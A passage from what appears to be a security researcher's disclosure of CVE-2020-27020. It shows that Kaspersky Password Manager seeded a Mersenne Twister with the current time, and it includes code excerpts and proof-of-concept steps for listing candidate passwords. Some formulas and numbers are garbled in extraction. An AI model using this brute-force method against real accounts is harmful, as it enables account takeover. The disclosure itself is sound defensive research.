Finally, 

GetRandomUInt64
 is a uniform random number generator that outputs values between 0 and cc — 1:


<strong>internal</strong> <strong>ulong</strong> <strong>GetRandomUInt64</strong>(<strong>ulong</strong> uMaxExcl)
{
    <strong>if</strong>(uMaxExcl == 0) { Debug.<strong>Assert</strong>(<strong>false</strong>); <strong>throw</strong> <strong>new</strong> <strong>ArgumentOutOfRangeException</strong>("uMaxExcl"); }

    <strong>ulong</strong> uGen, uRem;
    <strong>do</strong>
    {
        uGen = <strong>GetRandomUInt64</strong>();
        uRem = uGen % uMaxExcl;
    }
    <strong>while</strong>((uGen - uRem) &gt; (<strong>ulong</strong>.MaxValue - (uMaxExcl - 1UL)));
    <em>// This ensures that the last number of the block (i.e.</em>
    <em>// (uGen - uRem) + (uMaxExcl - 1)) is generatable;</em>
    <em>// for signed longs, overflow to negative number:</em>
    <em>// while((uGen - uRem) + (uMaxExcl - 1) &lt; 0);</em>

    <strong>return</strong> uRem;
}

What is important here is that each character is generated independently from the other ones: every character is random, and knowing which character has been generated before does not give us information about the next char that will be generated.

Finally, let’s assume 

GetRandomUInt64
 is cryptographically strong, and generates a random 64-bit number. Why is there a loop here, and why does this function is not simply implemented as 
return GetRandomUInt64() % uMaxExcl;
?

Uniform random number generation

This loop is essential to uniformly generate numbers in a range.

Imagine you want to get a random char from a charset of 10 possible chars, and you have a random number generator method 

GetRandom32
 which outputs number between 0 and 32 (32 excluded). The straightforward way to output such char would be:


<strong>const</strong> string charset <strong>=</strong> "0123456789";
<strong>return</strong> charset&#91;GetRandom32() <strong>%</strong> 10];

Let’s see how characters are generated:

  • “4” is returned if 
    GetRandom32()
     returns 4, 14 or 24 (3 possible values)
  • “5” is returned if 
    GetRandom32()
     returns 5, 15 or 25 (3 possible values)
  • But “1” is returned if 
    GetRandom32()
     returns 1, 11, 21 and 31 (4 possible values!)

The distribution is given below:

Distribution of GetRandom32() mod 10

So there is a bias with this method: as one can see from the outputs, digits 0 and 1 will be output more frequently than the other ones. It is commonly called the “modulo bias”. You should check the excellent Definitive guide to “modular bias” and how to avoid it, by Kudelski Security, for more information.

To remove this “modulo bias”, a common method is to discard all the numbers greater than or equal to 30 (the biggest multiple of 10 lower than 16):


<strong>const</strong> <strong>string</strong> charset = "0123456789";
<strong>do</strong> {
    uGen = <strong>GetRandom32</strong>();
} <strong>while</strong> (uGen &gt;= 30);
<strong>return</strong> charset&#91;uGen];

This is exactly what KeePass does, though the bias in KeePass would be much less significant than in the current example, because the 

GetRandomUInt64
 generates values much bigger than the size of the password character set.

We saw how to uniformly select a character from a given range of characters, assuming our random source is uniform. Let’s see now what kind of source is suitable to generate cryptographically strong random numbers.

Cryptographically secure PRNG

Generated numbers must be random. But what does that mean exactly? An ordinary good PRNG will pass a series of tests, mainly statistical randomness tests such as Diehard or Dieharder tests.

A cryptographically secure PRNG (CSPRNG) will also pass those tests, but it also has two other requirements:

  • It must satisfy the next-bit test. Knowing all the bits already generated by a CSPRNG, there is no polynomial-time method that will predict the next bit with a probability higher that 0.5.
  • If, at any moment, the whole state of the CSPRNG is compromised, there is no way to retrieve the bits previously returned by the CSPRNG.

These points are essential for password generation. For example, if a password has been compromised for some reason, and if a non-CSPRNG has been used to generate this password, an attacker could then be able to retrieve the other password generated using this PRNG. Most operating systems provide CSPRNG implementations: CryptGenRandom on Windows, or 

/dev/random
 on UNIX-like operating systems.

Some software prefer to use their own implementation, often seeded, fully or partially, by the operating system PRNG. KeePass uses two PRNG, based either on Salsa20 and ChaCha20, and a legacy one based on a variant of ARCFour. Let’s assume the first two PRNG are cryptographically secure: we have now all the elements to generate random, secure passwords from a given charset.

Kaspersky’s Password Generation Method

Kaspersky Password Manager has a built-in password generator, which creates password from a given “policy”. The policy settings are simple: password length, uppercase letters, lowercase letters, digits, and a custom set of special chars. All these settings can be configured in the Password generator interface, as shown here (this is the standard setting):

KPM Password Generator

By default, KPM generates 12-character passwords with an extended charset.

Tricking the frequency of appearance

The generation procedure is much more complex than the Keepass method. KPM first picks two random floats r1r1 and r2r2 between 0 and 1, and multiplies them with the length of the password charset to pick a value in the charset table:


charset <strong>=</strong> ...  <em># character set to use
</em>r1 <strong>=</strong> random.random()
r2 <strong>=</strong> random.random()
pos <strong>=</strong> r1 <strong>*</strong> r2 <strong>*</strong> len(charset)
<strong>return</strong> charset&#91;pos]

The distribution of r1×r2r1×r2 is (thanks to MathWorld):P[r1r2=a]=====∫10∫10δ(xy−a)dydx∫10∫x−a−aδ(z)1xdzdx∫101(x≥a)1xdx∫1a1xdx−ln(a)(1)(2)(3)(4)(5)(1)P[r1r2=a]=∫01∫01δ(xy−a)dydx(2)=∫01∫−ax−aδ(z)1xdzdx(3)=∫011(x≥a)1xdx(4)=∫a11xdx(5)=−ln(a)

Let’s plot it:

Uniform product distribution

The distribution of this function is not uniform: lower positions have more chances to occur than values near from 1. Such method is quite puzzling, but it seems it is exactly what KPM wanted to implement.

How is created the charset? Is it fully ordered, like “abcdefghij…”? No…

  • For the first three chars, charset is fully ordered (almost… we will see that later).
  • Then, for the next chars, KPM relies on letter frequency: it assumes least frequent letters (in some language) should appear more often in the generated password. The supposed frequency of apparition of each letter, as used in KPM, is shown in the graph below:
Passwords letter frequency

Then, charset is ordered according to the inverse frequency of appearance of each letter: q, x, z, w… n, a, e.

As lower values are more likely to appear given the distribution function, we can assume some chars like “q” and “x” are much more likely to appear in passwords generated by KPM.

If these stats were taken independently to generate every char of a password, we could see often several “q”, “x” or “z” in the passwords. However, things are more complex: generated chars are taken into account in the computation of the frequencies of appearance. If a “z” is generated, then the probability of appearance of “z” in the frequency table will be strongly increased. Once the charset is ordered according to this table, “z” will be at the end of the table, and will have much less changes to be taken.

Variation of the probability of appearance of each letter

These changes also affect other letters: after “z” has been picked, the probability of “a”, “e”, “m”, “q”, “s” and “x” has also increased. On the contrary, “h” has decreased. But, after “h” is picked, its probability of appearance will then increase a lot.

Our hypothesis is that method has been implemented to trick standard password cracking tools. Password crackers such as Hashcat or John the Ripper try to break first probable password, e.g. passwords generated by humans. Their password cracking method relies on the fact that there are probably “e” and “a” in a password created by a human than “x” or “j”, or that the bigrams “th” and “he” will appear much more often than “qx” or “zr”.

Dedicated techniques such as Markov generator, which assume that there is a hidden Markov model in the way passwords are generated by humans, can directly break this method of generation (see Fast Dictionary Attacks on Passwords Using Time-Space Tradeoff for more details).

Hence, passwords generated by KPM will be, on average, far in the list of candidate passwords tested by these tools. If an attacker tries to crack a list of passwords generated by KPM, he will probably wait quite a long time until the first one is found. This is quite clever.

However, if an attacker knows that a password has been generated by KPM, he can adapt his tool to take into account the model followed by KPM. As these passwords are, in a certain sense, biased (to tackle password crackers), this bias can be used to generate the most probable passwords generated by this tool, and test them first. A straightforward way to do it could be to use a Markov generator, as the one provided by John the Ripper (This method has not been tested).

We can conclude that the generation algorithm in itself is not that bad: it will resist against standard tools. However, if an attacker knows a person uses KPM, he will be able to break his password much more easily than a fully random password. Our recommendation is, however, to generate random passwords long enough to be too strong to be broken by a tool.

We previously saw that KPM picked two random values r1r1 and r2r2 to compute an index in the charset table. Let’s see now how these values are computed.

KPM’s Random Number Generator

These two values come directly from the KPM PRNG. This PRNG outputs uniformly floats between 0 and 1, 1 excluded.

The PRNG used differs in the Desktop and the Web version:

  • The Web version used 
    Math.random()
    . This function is not suitable to generate cryptographically secure random numbers (which includes entropy required to generate passwords), as explained in https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/random. The underlying PRNG used by Chrome, Firefox and Safari for 
    Math.random()
     is xorshift128+. It is very fast, but not suitable to generate cryptographic material. The security consequences in KPM has not been studied, but we advised Kaspersky to replace it with 
    window.crypto.getRandomValues()
    , as recommended by the Mozilla documentation page previously mentioned.
  • The desktop version used a PRNG provided by Boost: the mt19937 Mersenne Twister. Mersenne Twister is very good and widely used PRNG, and MT 19937 is the most popular Mersenne Twister. It is uniformly distributed, has a very long period, and is fast compared to the other “good” PRNGs.

However, is using a Mersenne Twister a good idea to create passwords? Definitely not.

The problem with this generator is that it is not a CSPRNG. Knowing a few of its ouputs (624 in that case) allows to retrieve its full state, and to predict all the values it will generate, plus all the values it has already generated (see Berlekamp-Massey or Reeds-Sloane algorithms).

Off-the-shelf tools like randcrack are available to break Python’s 

random
 module, which uses a very similar (if not the same) implementation of MT 19937. Only very minor adaptations should be necessary to break Boost implementation.

In practice, exploiting such flaw in the context of Kaspersky’s Password Manager is hard:

  • Passwords are short: 12 chars by default. Retrieving 624 password chars requires to grab 52 passwords.
  • The raw output value is not known: output value is the position in the charset of each letter of the password. More values could be necessary.
  • And we saw that this position in the charset is a the product of two values produced by the PRNG.

We do not see a straightforward way to attack this PRNG in the context of KPM.

Seeding the Mersenne Twister

We saw that the PRNG uniformly generates floats in [0, 1[. The code responsible for its initialization should look like:


mt19937<strong>::</strong>result_type seed <strong>=</strong> ...;
<strong>auto</strong> mtrand <strong>=</strong> std<strong>::</strong>bind(std<strong>::</strong>uniform_real_distribution<strong>&lt;</strong><strong>float</strong><strong>&gt;</strong>(0,1), mt19937(seed));

Where does the seed come from? The password generation function is called like this:


std<strong>::</strong>string pwlib<strong>::</strong>generatePassword(pwdlib<strong>::</strong>Policy policy, <strong>int</strong> seed)
{
    <strong>if</strong> (seed <strong>==</strong> 0) {
        FILETIME ft;

        GetSystemTimeAsFileTime(<strong>&amp;</strong>ft);
        seed <strong>=</strong> ft.dwLowDateTime <strong>+</strong> ft.dwHighDateTime;
    }
    <strong>auto</strong> mtrand <strong>=</strong> std<strong>::</strong>bind(std<strong>::</strong>uniform_real_distribution<strong>&lt;</strong><strong>float</strong><strong>&gt;</strong>(0,1), mt19937(seed));
    <strong>return</strong> generateRandomPassword(policy, mtrand);
}

This is super interesting for two reasons:

  • The seed is just 32 bits. That means it can be bruteforced easily.
  • An instance of the PRNG is created every time a password is generated. It means Kaspersky Password Manager can generated at most 232232 passwords for a given charset.

GetSystemTimeAsFileTime
 is used as a seed only if a seed is not provided to the 
generatePassword
 method. How is called this method when a user requests a new password? The answer is:


std<strong>::</strong>string pwlib<strong>::</strong>generatePassword(pwdlib<strong>::</strong>Policy policy)
{
  <strong>return</strong> generatePassword(policy, time(0));
}

So the seed used to generate every password is the current system time, in seconds. It means every instance of Kaspersky Password Manager in the world will generate the exact same password at a given second. This would be obvious to spot if every click on the “Generate” button, in the password generator interface, produced the same password. However, for some reason, password generation is animated: dozens of random chars are displayed while the real password has already been computed:

Animated password generation

This animation takes more than 1 second, so it is not possible to click several times on the “Generate” button within a second. That is definitely why the weakness had not been discovered before.

The consequences are obviously bad: every password could be bruteforced. For example, there are 315619200 seconds between 2010 and 2021, so KPM could generate at most 315619200 passwords for a given charset. Bruteforcing them takes a few minutes.

It is quite common that Web sites or forums display the creation time of accounts. Knowing the creation date of an account, an attacker can try to bruteforce the account password with a small range of passwords (~100) and gain access to it.

Moreover, passwords from leaked databases containing hashed passwords, passwords for encrypted archives, TrueCrypt/Veracrypt volumes, etc. can be also easily retrieved if they had been generated using Kaspersky Password Manager.

An unexpected source of entropy: out-of-bounds read

We wrote a proof of concept to make sure we were not missing something. It generates a list of 1000 possible passwords from the current time. To test the PoC:

  1. Compile the provided PoC (pwlib.cpp). File must be compiled with Visual C++ (floating values in the source code have not the exact same values when compiled with Clang or gcc). I used Visual C++ 2017 for my tests. Using a command invite for Visual C++ 32 bits, enter:
     cmake -Bbuild -H. msbuild build\pwbrute.vcxproj
  2. Run compiled executable to create a list of 1000 passwords.
     Debug\pwbrute.exe &gt; pass.txt
  3. Create a password in Kaspersky Password Manager with the following policy:
    • Lowercase only
    • 12 chars
  4. Verify that the generated password is indeed present in pass.txt.

It is not completely functional, but allowed us to discover a bug in the password generation process, in the function that computes the probability of appearance of a given letter knowing the previously generated chars. Here is the pseudo code for the 

getContextProbabilities
 method:


  <strong>const</strong> <strong>float</strong> <strong>*</strong><strong>getContextProbabilities</strong>(<strong>const</strong> std<strong>::</strong>string <strong>&amp;</strong>password) {
    std<strong>::</strong>string lowercasePassword;

    <em>// Convert to lowercase, keep only lowercase</em>
    <strong>for</strong> (<strong>char</strong> c <strong>:</strong> password) {
      <strong>if</strong> (islower(c)) {
        lowercasePassword <strong>+=</strong> c;
      } <strong>else</strong> <strong>if</strong> (isupper(c)) {
        lowercasePassword <strong>+=</strong> <strong>char</strong>(c <strong>-</strong> 'A' <strong>+</strong> 'a');
      }
    }
...
    <strong>int</strong> n <strong>=</strong> 0;
    <strong>for</strong> (<strong>int</strong> i <strong>=</strong> lowercasePassword.length() <strong>-</strong> 1; i <strong>&gt;=</strong> 0; i<strong>--</strong>) {
      <strong>int</strong> index <strong>=</strong> password&#91;i] <strong>-</strong> 'a'; <em>// FIXME: replace with lowercasePassword</em>

The password being built is converted to lowercase. Non-letters are removed. Then, there is an iteration on the password instead of the lowercase password just created. This leads to a wrong computation of the 

index
 variable (the position of a letter in the alphabet). This index is used to retrieve an element of an array. That leads to an out-of-bounds read of this array.

Frequency of appearances are then computed from uninitialized or arbitrary data in some cases. Although the algorithm is wrong, it actually makes the passwords more difficult to bruteforce in some cases.

The attacked PoC generates candidates for lowercase passwords only so that the index is always correctly computed (else the PoC requires to be adapted).

Remediation

Kaspersky assigned CVE-2020-27020 to this vulnerability, and published a security advisory on their web page: https://support.kaspersky.com/general/vulnerability.aspx?el=12430#270421.

All the versions prior to these ones are affected:

  • Kaspersky Password Manager for Windows 9.0.2 Patch F
  • Kaspersky Password Manager for Android 9.2.14.872
  • Kaspersky Password Manager for iOS 9.2.14.31

On Windows, the Mersenne Twister PRNG has been replaced with the BCryptGenRandom function:


<strong>float</strong> <strong>RandomFloat</strong>(BCRYPT_ALG_HANDLE <strong>*</strong>hAlgorithm) {
    <strong>uint32_t</strong> l;
    BCryptGenRandom(<strong>*</strong>hAlgorithm, (<strong>uint8_t</strong> <strong>*</strong>)<strong>&amp;</strong>l, <strong>sizeof</strong>(l), 0);
    <strong>return</strong> (<strong>float</strong>)l <strong>*</strong> (1.0f <strong>/</strong> 0x100000000);
}

The return value of this function was not checked in the beta versions provided by Kaspersky, but we guess this has been fixed now.

Math.random()
 in the Web version has been replaced with the secure 
window.crypto.getRandomValues()
 method.

Android and iOS versions have also been patched, but we have not looked at the fixes.

Conclusion

Kaspersky Password Manager used a complex method to generate its passwords. This method aimed to create passwords hard to break for standard password crackers. However, such method lowers the strength of the generated passwords against dedicated tools. We showed how to generate secure passwords taking KeePass as an example: simple methods like random draws are secure, as soon as you get rid of the “modulo bias” while peeking a letter from a given range of chars.

We also studied the Kaspersky’s PRNG, and showed it was very weak. Its internal structure, a Mersenne twister taken from the Boost library, is not suited to generate cryptographic material. But the major flaw is that this PRNG was seeded with the current time, in seconds. That means every password generated by vulnerable versions of KPM can be bruteforced in minutes (or in a second if you know approximately the generation time).

Finally, we provided a proof of concept that details the full generation method used by KPM. It can be used to verify the flaw is indeed present in Windows versions of Kaspersky Password Manager < 9.0.2 Patch F. Incidentally, writing this PoC allowed us to spot an out of bounds read during the computation of the frequency of appearance of password chars, which makes passwords a bit stronger that they should have been.

Timeline

  • June 15, 2019: report and proof of concept sent to Kasperky through HackerOne.
  • June 17, 2019: Kaspersky acknowledges it has received the report.
  • June 25, 2019: Kaspersky confirms the vulnerability.
  • October 4, 2019: Kaspersky sends a private Windows build so we can check the bugs have been fixed, and informs us they will rollout a solution to handle previously generated passwords before the end of the year.
  • October 8, 2019: we confirm the vulnerabilities have been fixed, but reported a new small defect in the fix.
  • October 10, 2019: Kaspersky Password Manager for Windows 9.0.2 Patch D is released, fixing the vulnerabilities, but without the fix for the reported defect. Web version is also updated.
  • October 9, 2019: Kaspersky Password Manager for Android version 9.2.14.872 with the fix is released.
  • October 10, 2019: Kaspersky Password Manager for iOS version 9.2.14.31 with the fix is released.
  • December 10, 2019: Kaspersky Password Manager for Windows 9.0.2 Patch F is released closing the defect in patch D.
  • April 9, 2020: Kaspersky informs us they will release a patch in October to handle previously generated passwords.
  • October 13, 2020: Kaspersky Password Manager 9.0.2 Patch M is released, with a notification to users to inform them some password must be re-generated. Kaspersky informs us the same notification will also be present in mobile versions during the first quarter of 2021. CVE-2020-27020 has also been reserved.
  • December 28, 2020: Kaspersky agrees a report about the vulnerability can be disclosed after the CVE is published.
  • April 27, 2021: Kaspersky security advisory is published.
  • May 14, 2021: Information for the CVE-2020-27020 is published.